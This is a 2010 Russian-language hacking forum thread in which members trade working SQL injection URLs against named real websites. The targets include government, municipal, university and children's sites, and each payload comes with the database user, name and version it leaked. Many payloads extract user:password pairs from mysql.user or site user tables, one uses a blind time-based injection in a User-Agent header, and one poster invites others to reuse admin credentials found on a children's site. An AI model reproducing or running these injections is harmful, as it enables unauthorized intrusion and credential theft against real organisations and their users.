24.03.2010, 01:19
|
|
Познающий
Регистрация: 07.08.2009
Сообщений: 36
С нами:
8822446
Репутация:
34
|
|
fid.su
fid.su - организация ответственная за зону .su. Инекция с insert'ом
Код:
User-Agent: BROWSER',ip=2130706433,recdate="SECURITY HOLE" or IF(SUBSTRING((SELECT VERSION()), 1, 1)=4, 1, BENCHMARK(5999999,MD5(NOW())))#
версия 4ая, остальное влом + страшно
Последний раз редактировалось Red_EYEs; 24.03.2010 в 01:25..
|
|
|
24.03.2010, 01:33
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
С нами:
9351139
Репутация:
1593
|
|
Код:
http://www.nzclaytarget.org.nz/clubs/club_page.php?id=1+union+select+1,2,3,user(),database(),version(),7,8,9,10,11,12,13--
Username: nzcta@ws3.mydns.net.nz
Database: nzclaytarget
Version: 5.0.86-log
Код:
http://pla.deptan.go.id/sub_content.php?p=renstra&id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6--
Username: adminpla@localhost
Database: pla_db
Version: 5.0.45-standard-log
Код:
http://www.vales.by/catalog.php?action=show_object&id=109+union+select+concat_ws(0x3a,user(),database(),version())--
Username: '@localhost  
Database: valesby
Version: 5.0.90
Последний раз редактировалось root_sashok; 24.03.2010 в 02:04..
|
|
|
|
24.03.2010, 01:55
|
|
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
С нами:
11010660
Репутация:
439
|
|
Моя первая)
отдельное спасибо Pashkela и -=Razor=- за помощь.
Код:
http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=-1+union+select+1,user(),3,database(),5,6,7,8,9,10+from+mysql.user
Username: root@localhost
Database: skyscout
Version: 4.1.22-community-nt |
|
|
|
24.03.2010, 12:59
|
|
Новичок
Регистрация: 02.12.2008
Сообщений: 1
С нами:
9178792
Репутация:
6
|
|
Сайт МИНСКЭНЕРГО - Министерство энергетики Беларуси
http://www.minskenergo.by/news/view/?id=15-2+union+select+1,version(),3,database(),user()/*
database: tenders
version: 5.0.45-community-nt
user: tenders@localhost |
|
|
|
24.03.2010, 03:50
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
С нами:
9351139
Репутация:
1593
|
|
Код:
http://netp.us/dev_news_detail.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8--
Username: dbo249050689@212.227.119.169
Database: db249050689
Version: 4.0.27-max-log (08-00-2000)
Код:
http://www.ci.bremerton.wa.us/display.php?id=1+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9,10,11,12,13,14--
Username: remcity@localhost
Database: bremcity
Version: 5.0.51a-3ubuntu5.4
Сегодня прямо квест, "найди вывод" 
Вторая часть квеста состоит в том, что нужно из исходника выкопать названия таблиц
Код:
articles
events
menus
onlinepoll
pictures
quicklinks
subsections
users
tbl_COBPARCELS
tbl_CityAddresses
tbl_ISUs
tbl_SITUS
columns_priv
db
func
help_category
help_keyword
help_relation
help_topic
host
incidentlist
landlordlist
proc
procs_priv
tables_priv
time_zone
time_zone_leap_second
time_zone_name
time_zone_transition
time_zone_transition_type
user
user_info
Код:
http://www.greenville.ms.us/calendar/eventdisplay.php?id=93+union+select+concat_ws(0x3a,user(),database(),version()),2,3--
Username: greenville428045@216.251.35.189
Database: calendar_greenville_ms_us
Version: 5.0.90-log
Код:
http://adhonep.us/index.php?id_version=1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6--
Username: adhonepu_root@localhost
Database: adhonepu_adhonep
Version: 5.0.51a-standard
Вывод в ссылке, ссылка — белым шрифтом по белому фону. При наводке меняет цвет 
Код:
http://www.ifph.us/learning/research.php?ID=1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8--
Username: heirraiser@97.74.24.120
Database: heirraiser
Version: 5.0.67.d7-ourdelta-log
Код:
http://www.preparingheirs.us/events/index.php?ID=2+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11--
Эта инъекция общая с предыдущей, т.е. Username, Database и Version — те же.
Последний раз редактировалось root_sashok; 24.03.2010 в 10:00..
|
|
|
|
24.03.2010, 13:38
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
С нами:
9351139
Репутация:
1593
|
|
Еще парочка US.
Код:
http://globaltechnicalsolutions.us/catalog/index.php?manufacturers_id=1+union+select+concat_ws(0x3a,user(),database(),version())--
Username: dbo276397828@74.208.16.79
Database: db2763
Version: 4.0.27-max-log
Код:
http://www.crownparts.us/article.php?id=1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8--
Username: db18917@64.13.232.46
Database: db18917_crownparts
Version: 4.1.25-Debian_mt1
Последний раз редактировалось root_sashok; 24.03.2010 в 14:04..
|
|
|
|
24.03.2010, 14:09
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
6 ветка edu
http://lab.bcb.iastate.edu/yabi/dir.php?dirID=1+union+select+version()--+
http://lab.bcb.iastate.edu/yabi/dir.php?dirID=1+union+select+version(),2,3,4,5,6,7 ,8,9,10,11,12,13--+
Version: 6.0.3-alpha-community
User: yabi_reader@localhost
Dbname: yabi |
|
|
|
24.03.2010, 14:20
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
С нами:
9351139
Репутация:
1593
|
|
Код:
http://www.cisci.net/user_info.php?lang=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8--
Username: ci000073_0001@ubh01-out2.ubh.inode.at
Database: ci000073_0001
Version: 5.0.67inode
Код:
http://www.centraldev.net/post.php?id=46+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10--
Username: centraldev@vdepartments.com
Database: centraldev
Version: 5.0.67-userstats-log
Код:
http://www.embedded-projects.net/index.php?page_id=260+union+select+concat_ws(0x3a,user(),database(),version())--
Username: '@localhost
Database: eprooshop
Version: 5.1.37-1ubuntu5.1
Код:
http://kchbo.chov.net/index.php?action=ulist&ID=4575+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9--
Username: belgicak@localhost
Database: belgicak
Version: 4.1.20
Последний раз редактировалось root_sashok; 24.03.2010 в 16:33..
|
|
|
|
24.03.2010, 16:58
|
|
Новичок
Регистрация: 31.12.2009
Сообщений: 19
С нами:
8611638
Репутация:
10
|
|
Называется "детский поисковик" (pr4, ТИЦ 240). отрыл 3 таблицы юзеров, в том числе и с помощью SIPTа.
Код HTML:
adrev_users -> 0x61647265765F7573657273
siuser -> 0x736975736572
tblUsers -> 0x74626C5573657273
нашел логин+пасс, по идее к админке, но вбиваю в http://www.agakids.ru/admin и нихрена не подходит.
Код HTML:
http://www.agakids.ru/shop/index.php?rub_id=7331&tov_id=-46184'+union+select+group_concat(database(),0x3a,user(),0x3a,version()+separator+0x0b)+--+
Попробуйте, может кому-нить и поможет! |
|
|
|
24.03.2010, 21:02
|
|
Новичок
Регистрация: 20.12.2008
Сообщений: 24
С нами:
9152742
Репутация:
62
|
|
Код:
http://old.powerkiting.cz/db/db.php?id=1+union+select+version()/*
Version: 4.1.22-LOG
User: KUBISTAJ@10.10.10.116
Database: KUBISTAJ
Код:
http://www.phusinghealth.com/print/dm.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49--
Version: 4.1.22-community-nt
User: phusinghealth@localhost
Database: phusinghealth
Код:
http://www.rubenspaiva.com/oxcosmeticos/n.php?id=1+union+select+1,version(),3,4--
Version: 5.0.89
Код:
http://www.skrigan.info/figura/news/nw.php?id=-1+union+select+1,2,version(),4,5,6--
Version: 5.0.75
User: u16366@78.108.84.11
database: b16366
Код:
http://www.paradise.reline.ru/stati_r2/na.php?id=-1+union+select+1,version(),3,4,5,6,7,8--
Version: 4.1.21
Код:
http://www.bizned.biz/articles/na.php?id=-1+union+SELECT+1,2,3,4,5,version(),7,8--
Version: 4.1.21
dataase: articles
User: root@localhost
Код:
http://biz-s.com/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
Vesrion: 4.1.21
User: root@localhost
Database: articles
Database: articles
Код:
http://www.swingingapestudios.com/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
Vesrion: 4.1.21
User: root@localhost
Database: articles
Database: articles
Код:
http://dpolevoy.com/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
Version: 4.1.21
Database: articles
User: root@localhost
Код:
http://www.dwwork.com/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
Version: 4.1.21
Database: articles
User: root@localhost
Код:
http://www.electrickidsindia.com/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
Version: 4.1.21
Database: articles
User: root@localhost
Код:
http://www.domovladelec.com/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
Version: 4.1.21
Database: articles
User: root@localhost
Код:
http://www.galaxyintel.com/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
Version: 4.1.21
Database: articles
User: root@localhos
Код:
http://sovety.info/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
Version: 4.1.21
Database: articles
User: root@localhost
Код:
http://spb-nets.ru/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
Version: 4.1.21
Database: articles
User: root@localhost
Код:
http://www.c913.net/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
Version: 4.1.21
Database: articles
User: root@localhost
Код:
http://www.pmdesign.ru/nv.php?id=-1+union+select+1,2,3,concat(login,0x3a,password),5+from+users+limit+0,1--
Version: 5.0.51a-24+lenny2-log
user: pmv_pmd@77.221.130.1
database: pmv_pmd
Код:
http://www.netc99.com/all_parameter/item-nb.php?id=-1%27+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables/*
Version: 5.0.45-community-nt
database: yaowumaonetc
user: yaowumaonetc@localhost
Код:
http://www.medienturm.at/mt.php?id=1&subm=0&_pid=-323+union+SELECT+1,2,3,4,concat(name,0x3a,password),6,7,8,9,10,11,12,13+from+tab_users+limit+1,1--
Version: 5.0.51a-24+lenny1-log
Код:
http://www.diffondi.it/ma.php?id=-1+union+select+1,version()--
Version: 4.1.22
database: diffondi
user: diffondi@localhost
Код:
http://ls.tjpro.net/mf.php?id=-1+union+select+1,2,3,4,5,user+from+mysql.user--
version: 5.1.28-rc
User: root@localhost
database:livesound
Код:
http://www.anthemflag.com/articles/mx.php?id=-1+union+SELECT+concat(user,0x3a,password),2+from+mysql.user+limit+0,1--
version: 4.1.22-standard-log
Код:
http://www.gsi.be/mc.php?id=1+union+select+1,Concat(user,0x3a,password),3,4,5,6,7,8,9,10+from+mysql.user--
Version: 4.1.21-community-nt
Код:
http://selecthobby.com.hk/mv.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13--
version: 5.0.51a-3ubuntu5.4
Код:
http://www.marketingaction.com/mm.php?id=-1+union+select+1,version(),3--
Version: 5.0.89-community
User: maction_cp@localhost
database: maction_cp
Код:
http://www.nakupujete.cz/images/sms/vyhry/canon-eos-500D-objektiv-efs-18-55-mm.php?id=-1+union+select+1,2,3,4,concat(user_name,0x3a,pwd),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users+limit+0,1--
Version: 5.1.32
Сегодня немного разошелся =) |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
